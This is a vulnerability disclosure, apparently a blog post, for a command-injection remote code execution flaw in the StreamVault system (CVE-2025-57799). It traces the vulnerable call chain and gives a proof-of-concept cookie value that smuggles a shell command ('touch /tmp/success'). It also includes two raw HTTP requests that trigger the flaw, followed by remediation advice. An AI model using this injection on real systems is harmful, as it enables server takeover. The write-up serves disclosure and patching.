StreamVault-system RCE vulnerability.

Summary

  • After logging into the StreamVault system, an attacker can modify certain system parameters (such as cookies for various video platforms), construct malicious commands, execute command injection attacks against the system, and ultimately gain server privileges.

Details

  • The StreamVault system assembles user-provided data on the backend. Some of this data is passed, without proper sanitization, into the following call chain: CommandUtil.f2cmd -> CommandUtil.commandos(cmd.toString()) -> new ProcessBuilder("/bin/sh", "-c", command);
  • Taking the Douyin Cookie configuration item within the Douyin/Kuaishou configuration module as an example.

image-20250822165318160

image-20250822165334434

image-20250822165436004

image-20250822165449014

image-20250822165509446

  • It can be seen that the cookie is directly concatenated into a Python script execution command. If the cookie content is maliciously constructed, such as "; [Command]; echo ", arbitrary commands can be executed.
  • Such as "; touch /tmp/aaabbb222; echo "

image-20250822165727163

  • Then trigger the invocation interface of that cookie.

image-20250822165812769

  • Wait for 1 to 2 minutes, and then the command can be executed.

image-20250822165935551

Remediation Recommendations

  • The vulnerability point I mentioned above is just an example. There are other instances in the system where command concatenation leads to execution. Please fix these as well.
    • Use parameterized methods instead of string concatenation.
    • Avoid using system commands; use built-in language functions or secure libraries as alternatives.
    • Validate input (not the primary recommendation, as it still carries the risk of being bypassed).
    • Escape special characters.
    • Execute commands in a restricted environment.

PoC

"; touch /tmp/success; echo "

Data packet

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
POST /admin/api/updateTikTokConfig HTTP/1.1
Host: 192.168.31.18:28083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 54
Origin: http://192.168.31.18:28083
Sec-GPC: 1
Connection: close
Referer: http://192.168.31.18:28083/admin/config
Cookie: JSESSIONID=0A94699072E4BC00877626D9C0A13837
Priority: u=0

id=1&cookies=%22%3B+touch+%2Ftmp%2Fsuccess%3B+echo+%22
1
2
3
4
5
6
7
8
9
10
11
12
13
14
GET /admin/api/loadDouFav?uid=1 HTTP/1.1
Host: 192.168.31.18:28083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: http://192.168.31.18:28083
Sec-GPC: 1
Connection: close
Referer: http://192.168.31.18:28083/admin/config
Cookie: JSESSIONID=0A94699072E4BC00877626D9C0A13837


Impact

  • Users of all versions of the StreamVault system to date who have not modified their background passwords or use weak passwords are at risk of having their systems taken over via remote command execution.

CVE

  • CVE-2025-57799
许可协议

本文采用 署名-非商业性使用-相同方式共享 4.0 国际 许可协议,转载请注明出处。